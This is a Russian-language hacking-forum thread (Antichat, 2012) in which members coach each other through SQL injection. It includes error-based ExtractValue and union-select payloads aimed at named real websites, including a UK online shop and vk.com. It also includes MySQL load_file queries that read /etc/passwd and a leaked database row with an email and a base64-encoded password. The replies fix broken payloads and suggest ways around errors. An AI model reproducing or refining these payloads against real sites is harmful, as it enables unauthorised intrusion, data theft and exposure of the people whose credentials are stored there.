 |
|
20.10.2012, 17:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от WendM
А что делает функция ExtractValue () ?
http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html#function_extractvalue
подобными вопросами в гугл, не флудим в теме
|
|
|
20.10.2012, 17:19
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
http://vk.com/id1'+union+select+1,2,3+--+
Подскажите как вывести все пароли? Что я делаю не так?
|
|
|
|
20.10.2012, 18:28
|
|
Новичок
Регистрация: 19.10.2012
Сообщений: 7
С нами:
7139126
Репутация:
0
|
|
В sql бекапе нашел следующую запись
('3','dsamir','dGVzdDEyMzQ=','miroslav@forge.com.u a','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')
dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?
Я только начинаю курить..
|
|
|
|
20.10.2012, 18:29
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Aplik
В sql бекапе нашел следующую запись
('3','dsamir','dGVzdDEyMzQ=','miroslav@forge.com.u a','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')
dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?
Я только начинаю курить..
Кодировка base64
|
|
|
|
20.10.2012, 18:41
|
|
Новичок
Регистрация: 19.10.2012
Сообщений: 7
С нами:
7139126
Репутация:
0
|
|
Сообщение от Konqi
Кодировка base64
спасибо
жалко только пароль не подходит
|
|
|
|
20.10.2012, 23:09
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
Сообщение от None
insert into ib4.a values ('(SELECT load_file("/etc/passwd")')
чет вместо содержимого etc/passwd пишет его как строчку. как исправить? |
|
|
|
20.10.2012, 23:16
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
Сообщение от qaz
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?
Пробовал просто вывести?
Сообщение от None
SELECT load_file("/etc/passwd")
С кавычками играл?
|
|
|
|
20.10.2012, 23:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от qaz
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?
епрст! ну сколько можно. когда наконец откроете гребанный учебник по MySQL?
все что внутри кавычек - называется строкой
вы пишите текст, потом удивляетесь
insert into tbl (`wtf`) values ((select load_file('/etc/passwd')))
|
|
|
|
21.10.2012, 08:05
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от Konqi
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3a,version())))='1. html
Спасибо еще раз. Но дольше раскрутить не могу.
Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html
Но выдает ошибку 406. Что можно сделать?
|
|
|
|
21.10.2012, 09:27
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от WendM
Спасибо еще раз. Но дольше раскрутить не могу.
Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html
Но выдает ошибку 406. Что можно сделать?
лимит использовать
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
